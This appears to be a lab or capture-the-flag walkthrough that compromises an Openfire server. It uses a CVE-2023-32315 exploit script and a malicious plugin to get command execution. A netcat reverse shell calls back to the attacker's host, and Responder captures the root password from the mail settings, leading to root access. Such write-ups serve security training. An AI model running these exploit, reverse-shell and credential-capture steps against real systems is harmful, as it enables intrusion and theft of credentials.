9090
We have openfire.
Using this exploit
python3 CVE-2023-32315.py -u http://192.168.243.96:9090

We can login with hugme:hugmeNOW
uploading openfire-management-tool-plugin.jar file from https://github.com/miko550/CVE-2023-32315
Now in server->server settings->Management tool Enter password
123
: We have command execution.
Using payload busybox nc 192.168.45.229 9090 -e bash
:
And listening using penelope: We have a shell as openfire.
We can change admin password too:
We can go to email settings: We can change the host and save. The root password is already filled.
Run responder:
sudo responder -I tun0 -A
Now send a test mail:
We get the root password: Now we can switch to root with
su root
: We are root :)
Last updated
Was this helpful?